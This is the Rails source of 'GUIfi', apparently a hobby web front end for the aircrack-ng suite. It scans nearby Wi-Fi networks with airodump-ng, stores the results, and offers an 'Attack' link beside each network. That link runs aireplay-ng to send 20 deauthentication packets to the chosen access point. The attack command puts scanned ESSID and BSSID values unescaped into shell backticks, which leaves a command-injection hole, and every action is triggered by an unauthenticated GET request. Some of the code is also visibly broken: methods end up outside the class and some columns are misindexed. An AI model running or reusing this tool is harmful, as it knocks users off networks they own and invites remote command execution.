config/routes.rb
Rails.application.routes.draw do
  resources :ouis
  resources :frequencies
  resources :clients


  get '/networks/test' => 'networks#test', as: :test
  get '/networks/load' => 'networks#load', as: :load
  get '/networks/kill' => 'networks#kill', as: :kill
  get '/networks/scan' => 'networks#scan', as: :scan
  get '/networks/report' => 'networks#report', as: :report
  get '/networks/:id/attack' => 'networks#attack', as: :attack

  resources :networks


  # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end

app/models/application_record.rb
class ApplicationRecord < ActiveRecord::Base
  self.abstract_class = true
end

app/models/client.rb
class Client < ApplicationRecord
end

app/models/frequency.rb
class Frequency < ApplicationRecord
end

app/models/network.rb
class Network < ApplicationRecord
end

app/models/oui.rb
class Oui < ApplicationRecord
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception
end

app/controllers/clients_controller.rb
class ClientsController < ApplicationController
end

app/controllers/frequencies_controller.rb
class FrequenciesController < ApplicationController
end

app/controllers/networks_controller.rb
class NetworksController < ApplicationController
      require 'csv'
      require 'open3'
      require 'chartkick'
      require 'groupdate'
      require 'active_median'


  def index
    @Date = `date`
    @Hostname = `hostname`
    @User = `whoami`
    @NetworkInf = `iwconfig`
    @airmonstat = `airmon-ng`
    @airmoncheck = `airmon-ng check`
    @airmonkill = `airmon-ng check kill`
    @airmonstart = `airmon-ng start wlan0`
  end

  def test
    @iwconfig = `iwconfig`

  end

  def report
    @Networks = Network.all
    #@Network_data = Network.limit(5).order('Data')
    @Networks_data = Network.all.order("Data").limit(5)


  end

  def load

    #Networks_text = CSV.read("#{Rails.root}/public/seed.kismet-01.kismet.csv")
    @Networks_text = File.read("#{Rails.root}/public/seed.kismet-01.kismet.csv", encoding: 'ISO-8859-1:UTF-8')
    @Networks_text_to_csv = @Networks_text.tr("\r", '')

    CSV.parse(@Networks_text_to_csv, :col_sep => ";") do |row|


        #CSV.foreach("#{Rails.root}/public/seed.kismet-01.kismet.csv", :col_sep => (";")) do |row|


          #csv  Network.create({bssid: row[0], First_time_seen: row[1], Last_time_seen: row[2],channel: row[3], Speed: row[4],Privacy: row[5], Cipher: row[6], Authentication: row[7], Power: row[8], beacons: row[9], IV: row[10], LAN_IP: row[11], ID_lenght: row[12], ESSID: row[13], Key: row[14],})
          # kismet
          Network.create({
            Network: row[0], NetType: row[1], ESSID: row[2], BSSID: row[3],
            Info: row[4], Channel: row[5], Cloaked: row[6], Encryption: row[7],
            Decrypted: row[8], MaxRate: row[9], MaxSeenRate: row[10],
            Beacon: row[11], LLC: row[12], Data: row[13], Crypt: row[14],
            Weak: row[15], Total: row[16], Carrier: row[17], Encoding: row[18],
            FirstTime: row[19], LastTime: row[20], BestQuality: row[21],
            BestSignal: row[22], BestNoise: row[23], GPSMinLat: row[23],
            GPSMinLon: row[24], GPSMinAlt: row[25], GPSMinSpd: row[26],
            GPSMaxLat: row[27], GPSMaxLon: row[28], GPSMaxAlt: row[29],
            GPSMaxSpd: row[30], GPSBestLat: row[31], GPSBestLon: row[32],
            GPSBestAlt: row[33], DataSize: row[34], IPType: row[35],
            IP: row[36],
            })

    end
  end

  def scan
    @NetworkInf = `iwconfig`
    #@Networks_scan = `timeout 20 airodump-ng -w /root/GUIfi/public/seed.kismet --output-format kismet --write-interval 1 wlan0mon`
    #system ('timeout 20 airodump-ng -w /root/GUIfi/public/seed.kismet --output-format kismet --write-interval 1 wlan0mon')
    system ('./scan.sh')
    #system ("bash -c 'timeout 20 xterm airodump-ng -w /root/GUIfi/public/seed.kismet --output-format kismet --write-interval 1 wlan0mon')


    @Networks_text = File.read("#{Rails.root}/public/seed.kismet-01.kismet.csv", encoding: 'ISO-8859-1:UTF-8')
    @Networks_text_to_csv = @Networks_text.tr("\r", '')

    CSV.parse(@Networks_text_to_csv, :col_sep => ";") do |row|

          Network.create({
            Network: row[0], NetType: row[1], ESSID: row[2], BSSID: row[3],
            Info: row[4], Channel: row[5], Cloaked: row[6], Encryption: row[7],
            Decrypted: row[8], MaxRate: row[9], MaxSeenRate: row[10],
            Beacon: row[11], LLC: row[12], Data: row[13], Crypt: row[14],
            Weak: row[15], Total: row[16], Carrier: row[17], Encoding: row[18],
            FirstTime: row[19], LastTime: row[20], BestQuality: row[21],
            BestSignal: row[22], BestNoise: row[23], GPSMinLat: row[23],
            GPSMinLon: row[24], GPSMinAlt: row[25], GPSMinSpd: row[26],
            GPSMaxLat: row[27], GPSMaxLon: row[28], GPSMaxAlt: row[29],
            GPSMaxSpd: row[30], GPSBestLat: row[31], GPSBestLon: row[32],
            GPSBestAlt: row[33], DataSize: row[34], IPType: row[35],
            IP: row[36],
            })

    end

end

  def update

  end

  def show
    @Networks = Network.all
  end

  def attack
    @Network_attack = Network.find(params[:id])
      @killall = `airmon-ng stop wlan0mon`
      @NetworkInf = `iwconfig`
      @airmonstart = `airmon-ng start wlan0 #{@Network_attack.Channel}`
      @airreplayng = `aireplay-ng -0 20 -a #{@Network_attack.BSSID} wlan0mon -e #{@Network_attack.ESSID} `
    end
  end

  def locate

  end

  def kill
    @killall = `airmon-ng stop wlan0mon`
    @NetworkInf = `iwconfig`
  end

app/controllers/ou_is_controller.rb
class OuIsController < ApplicationController
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/clients_helper.rb
module ClientsHelper
end

app/helpers/frequencies_helper.rb
module FrequenciesHelper
end

app/helpers/networks_helper.rb
module NetworksHelper
end

app/helpers/ou_is_helper.rb
module OuIsHelper
end

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
  <head>
    <title>GUIfi</title>
    <%= csrf_meta_tags %>

    <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
  </head>

  <body>
    <%= yield %>
  </body>
</html>

app/views/networks/attack.html.erb
<!DOCTYPE html>
<html lang="en">
<head>
  <title>AirCrack GUIfi</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>


  <div class="container">
    <h2>Options</h2>
    <button type="button" class="btn" onclick="window.location.href='/networks'" >Home</button>
    <button type="button" class="btn btn-default" onclick="window.location.href='/networks/test'" >Test</button>
    <button type="button" class="btn btn-success"  onclick="window.location.href='/networks/scan'" >Scan</button>
    <button type="button" class="btn btn-primary"  onclick="window.location.href='/networks/report'" >Report</button>
    <button type="button" class="btn btn-warning" onclick="window.location.href='/networks/load'" >Load static</button>
    <button type="button" class="btn btn-danger" onclick="window.location.href='/networks/kill'" >Kill</button>
    <button type="button" class="btn btn-info" onclick="window.location.href='/networks/show'" >Show</button>
  </div>

<div class="container">
  <h2>Attacking Network...</h2>
  <div class="panel panel-default">
    <div class="panel-heading">ATTACK: 20 deauthentiaction packets will be send...</div>
    <div class="panel-body">

      <table class="table table-hover">
        <thead>

        <tr>
          <th>GUIfi</th>
        </tr>

          <tr>
            <td><%= @Network_attack.id %></td>
            <td><%= @Network_attack.ESSID %></td>
            <td><%= @Network_attack.BSSID %></td>
            <td><%= @Network_attack.Channel %></td>
            <td><%= @Network_attack.Encryption %></td>
            <td><%= @Network_attack.Decrypted %></td>
            <td><%= @Network_attack.LastTime %></td>
          </tr>


    </tbody>
  </table>


    </div>

    <div class="panel-body">

      <h3> Stoping driver: </h3>
      <span> <%= @killall %> </span>
      <span> <%= @NetworkInf %> </span>
      <br>
      <br>
      <h3> Starting driver: </h3>
      <span> <%= @airmonstart %> </span>
      <br>
      <br>
      <h3> Attack output: </h3>
      <span> <%= @airreplayng %> </span>

  </div>
</div>

</body>
</html>

app/views/networks/index.html.erb
<!DOCTYPE html>
<html lang="en">
<head>
  <title>AirCrack GUIfi</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>

<div class="jumbotron text-center">
  <h1>GUIfi 0.1</h1>
  <p>A graphic web interfase for Aircrack running on Rails</p>
</div>

<div class="container">
  <div class="row">
    <div class="col-sm-4">
      <h3>System information</h3>
      <strong>Date and Time: </strong><span><%= @Date %></span><br>
      <br>
      <strong>Hostname: </strong><span><%= @Hostname %></span><br>
      <br>
      <strong>Current User: </strong><span><%= @User %></span><br>

    </div>
    <div class="col-sm-4">
      <h3>Wireless interfaces</h3>
      <strong>Network Information: </strong><span><%= @NetworkInf %></span><br>
      <br>
      <strong>Wireless interfaces: </strong><span><%= @airmonstat  %></span><br>
      <br>
    </div>
    <div class="col-sm-4">
      <h3>Aircrack Status</h3>

      <strong>Checking processes: </strong><span><%= @airmoncheck  %></span><br>
      <strong>Killing intruder processes:</strong><span><%= @airmonkill  %></span><br>
      <strong>Monitor mode in wlan0::</strong><span><%= @airmonstart  %></span><br>

    </div>
  </div>
</div>

</body>
</html>



<div class="container">
  <h2>Options</h2>
  <button type="button" class="btn" onclick="window.location.href='/networks'" >Home</button>
  <button type="button" class="btn btn-default" onclick="window.location.href='/networks/test'" >Test</button>
  <button type="button" class="btn btn-success"  onclick="window.location.href='/networks/scan'" >Scan</button>
  <button type="button" class="btn btn-primary"  onclick="window.location.href='/networks/report'" >Report</button>
  <button type="button" class="btn btn-warning" onclick="window.location.href='/networks/load'" >Load static</button>
  <button type="button" class="btn btn-danger" onclick="window.location.href='/networks/kill'" >Kill</button>
  <button type="button" class="btn btn-info" onclick="window.location.href='/networks/show'" >Show</button>
</div>

app/views/networks/kill.html.erb
<h1>AirCrack GUIfi</h1>
<br>
<h2>System information</h2>

<br>
<strong>"airmon-ng stop wlan0mon": </strong><span><%= @killall    %></span><br>
<br>
<strong>Network Information: </strong><span><%= @NetworkInf %></span><br>
<br>
<br>






<%= link_to "Home", networks_path %>
<%= link_to "Test", test_path %>
<%= link_to "Load", load_path %>
<%= link_to "Kill", kill_path %>
<%= link_to "Scan", scan_path %>

app/views/networks/load.html.erb
<h1>AirCrack GUIfi</h1>
<br>
<h2>Reading Aircrack output...</h2>

<br>


<%= link_to "Home", networks_path %>
<%= link_to "Test", test_path %>

app/views/networks/report.html.erb
<!DOCTYPE html>
<html lang="en">
<head>
  <title>AirCrack GUIfi</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>

  <%= javascript_include_tag "//www.google.com/jsapi" %>
  <%= javascript_include_tag "application", "chartkick" %>


  <div class="container">
    <h2>GUIfi wireless report</h2>
    <div class="panel panel-default">
      <div class="panel-heading">
        <h1>Summary</h1></div>

      <div class="panel-body">
        <br>

        <div class="row">
          <div class="col-xm-6">
            <h3>Total Networks by Encryption</h3>
            <%= pie_chart @Networks.group(:Encryption).count %>
          </div>
        </div>
      </div>



            <div class="panel-body">
              <br>

              <div class="row">
                <div class="col-xm-6">
                  <h3>Total Networks by Channel</h3>
                      <%= column_chart @Networks.group(:Channel).count %>
                </div>
              </div>




      <div class="panel-body">
        <br>

        <div class="row">
          <div class="col-xm-6">
            <h3>Total Networks by data packets captured</h3>
                <%= column_chart @Networks.pluck(:ESSID, :Data), xtitle: "Network", ytitle: "Number of packets", label: "Value" %>
          </div>
        </div>


    </div>
  </div>



  <div class="container">
    <h2>Options</h2>
    <button type="button" class="btn" onclick="window.location.href='/networks'" >Home</button>
    <button type="button" class="btn btn-default" onclick="window.location.href='/networks/test'" >Test</button>
    <button type="button" class="btn btn-success"  onclick="window.location.href='/networks/scan'" >Scan</button>
    <button type="button" class="btn btn-primary"  onclick="window.location.href='/networks/report'" >Report</button>
    <button type="button" class="btn btn-warning" onclick="window.location.href='/networks/load'" >Load static</button>
    <button type="button" class="btn btn-danger" onclick="window.location.href='/networks/kill'" >Kill</button>
    <button type="button" class="btn btn-info" onclick="window.location.href='/networks/show'" >Show</button>
  </div>

  </body>
  </html>

app/views/networks/scan.html.erb
<!DOCTYPE html>
<html lang="en">
<head>
  <title>AirCrack GUIfi</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>

  <div class="container">
    <h2>Options</h2>
    <button type="button" class="btn" onclick="window.location.href='/networks'" >Home</button>
    <button type="button" class="btn btn-default" onclick="window.location.href='/networks/test'" >Test</button>
    <button type="button" class="btn btn-success"  onclick="window.location.href='/networks/scan'" >Scan</button>
    <button type="button" class="btn btn-primary"  onclick="window.location.href='/networks/report'" >Report</button>
    <button type="button" class="btn btn-warning" onclick="window.location.href='/networks/load'" >Load static</button>
    <button type="button" class="btn btn-danger" onclick="window.location.href='/networks/kill'" >Kill</button>
    <button type="button" class="btn btn-info" onclick="window.location.href='/networks/show'" >Show</button>
  </div>

  <div class="container">
    <h2>GUIfi wireless scanning...</h2>
    <div class="panel panel-default">
      <div class="panel-heading">
        <h1>Details:</h1></div>

      <div class="panel-body">
        <br>

        <div class="row">
          <div class="col-xm-6">
            <h3>Wireless inerfase</h3>
            <%= @NetworkInf %>
          </div>
        </div>
      </div>



            <div class="panel-body">
              <br>

              <div class="row">
                <div class="col-xm-6">
                  <h3>Information gattered</h3>
                      <%= @Networks_text_to_csv %>
                </div>
              </div>




    </div>
  </div>


  </body>
  </html>

app/views/networks/show.html.erb
<!DOCTYPE html>
<html lang="en">
<head>
  <title>AirCrack GUIfi</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>

  <div class="container">
    <h2>Options</h2>
    <button type="button" class="btn" onclick="window.location.href='/networks'" >Home</button>
    <button type="button" class="btn btn-default" onclick="window.location.href='/networks/test'" >Test</button>
    <button type="button" class="btn btn-success"  onclick="window.location.href='/networks/scan'" >Scan</button>
    <button type="button" class="btn btn-primary"  onclick="window.location.href='/networks/report'" >Report</button>
    <button type="button" class="btn btn-warning" onclick="window.location.href='/networks/load'" >Load static</button>
    <button type="button" class="btn btn-danger" onclick="window.location.href='/networks/kill'" >Kill</button>
    <button type="button" class="btn btn-info" onclick="window.location.href='/networks/show'" >Show</button>
  </div>

  <div class="container">
    <h2>Wireless networks detected:</h2>
    <p>Listing networks in 2.4 Ghz frequency:</p>
    <table class="table table-hover">
      <thead>
        <tr>
          <th>GUIfi</th>
        </tr>
        <% @Networks.each do |st| %>
          <tr>
            <td><%= link_to "Attack", attack_path(st.id)%></td>
            <td><%= st.id %></td>
            <td><%= st.ESSID %></td>
            <td><%= st.BSSID %></td>
            <td><%= st.Channel %></td>
            <td><%= st.Encryption %></td>
            <td><%= st.Decrypted %></td>
            <td><%= st.Data %></td>
            <td><%= st.LastTime %></td>

          </tr>
        <% end %>

      </tbody>
    </table>
  </div>

  </body>
  </html>

app/views/networks/test.html.erb
<h1>Test SO shell command</h1>

<strong>iwconfig output: </strong><span><%= @iwconfig %></span><br>
<br>
<br>

<%= link_to "Home", networks_path %>
<%= link_to "Test", test_path %>
<%= link_to "Load", load_path %>
<%= link_to "Kill", kill_path %>
<%= link_to "Scan", scan_path %>